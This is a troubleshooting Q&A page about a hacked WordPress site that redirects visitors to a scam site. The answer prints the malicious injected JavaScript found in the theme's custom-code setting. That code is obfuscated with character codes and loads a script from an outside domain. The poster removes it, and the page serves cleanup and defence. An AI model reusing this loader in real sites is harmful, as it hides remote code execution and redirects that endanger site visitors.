wordpress - Wordpress 被黑网站 JS:Fakepush-A [Trj]
问题描述
今天我的客户告诉我,他的网站会自动重定向到另一个外部诈骗网站。乍一看,文件目录没有问题,设置字段也没有注入。
Wordfence 没有报告任何类型的警告,但客户端机器中的 Avast Antivirus 报告木马警告:
“ JS:Fakepush-A [Trj] ” 感染
Wordpress 5.4.1 版 主题:报纸 V 6.6.4
有任何想法吗?
解决方案
仔细查看后,我在主题设置---->自定义代码----->自定义 Javascript 中发现了一部分似乎与原始项目无关的代码:
var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}
已移除。在完全清除缓存(包括 .js 分钟)后,网站不再重定向。此外,我认为主题需要升级。
推荐阅读
- azure - 如何在 azure 中托管?
- html - 悬停动画不流畅
- nix - 如何修复 NixOS 中的“坏消息”?
- javascript - Vuetify v-data-iterator 自定义“键:[]”名称
- python - 从另一个 Pandas 数据框中查找搜索词
- python - 如何阻止我的 If 语句向我提供错误信息?
- scheme - 为什么我的 n-queens 代码返回空列表?
- kotlin - 查找jetpack compose编译器时出错找不到androidx.compose:compose-compiler:1.0.0-alpha11
- android - 防止 Android 中的多个异步 startActivity 调用
- vue.js - 将 Nuxt-Auth 与 Cookie 一起使用